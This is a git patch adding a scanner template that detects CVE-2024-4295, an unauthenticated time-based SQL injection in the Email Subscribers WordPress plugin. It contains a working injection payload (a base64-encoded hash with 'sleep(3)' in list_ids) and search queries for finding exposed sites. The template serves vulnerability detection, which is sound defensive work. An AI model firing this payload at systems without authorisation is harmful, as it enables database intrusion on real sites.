From d67ca2233ec69211ed1a4c25f275b417225c6560 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Wed, 24 Jul 2024 13:08:28 +0530
Subject: [PATCH] Create CVE-2024-4295.yaml

---
 http/cves/2024/CVE-2024-4295.yaml | 52 +++++++++++++++++++++++++++++++
 1 file changed, 52 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-4295.yaml

diff --git a/http/cves/2024/CVE-2024-4295.yaml b/http/cves/2024/CVE-2024-4295.yaml
new file mode 100644
index 0000000000..424971ff76
--- /dev/null
+++ b/http/cves/2024/CVE-2024-4295.yaml
@@ -0,0 +1,52 @@
+id: CVE-2024-4295
+
+info:
+  name: Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    Email Subscribers by Icegram Express <= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.
+  remediation: Fixed in 5.7.21
+  impact: This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/641123af-1ec6-4549-a58c-0a08b4678f45?source=cve
+    - https://github.com/cve-2024/CVE-2024-4295-Poc
+    - https://github.com/truonghuuphuc/CVE-2024-4295-Poc
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-4295
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-4295
+    cwe-id: CWE-89
+    epss-score: 0.00091
+    epss-percentile: 0.39447
+    cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:*
+  metadata:
+    vendor: icegram
+    product: email_subscribers_\&_newsletters
+    framework: wordpress
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/email-subscribers/"
+    fofa-query: body="/wp-content/plugins/email-subscribers/"
+  tags: cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli
+
+variables:
+  contact_id: "{{contact_id}}"
+  email: "{{email}}"
+  rawhash: '{"message_id":0,"campaign_id":0,"contact_id":"{{contact_id}}","email":"{{email}}","guid":"dibwol-qaiebd-qvrgkp-lhyopm-rmyfzo","list_ids":["sleep(3)"],"action":"subscribe"}'
+
+http:
+  - raw:
+      - |
+        @timeout: 20s
+        GET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+          - 'contains(body, "You have been successfully subscribed")'
+        condition: and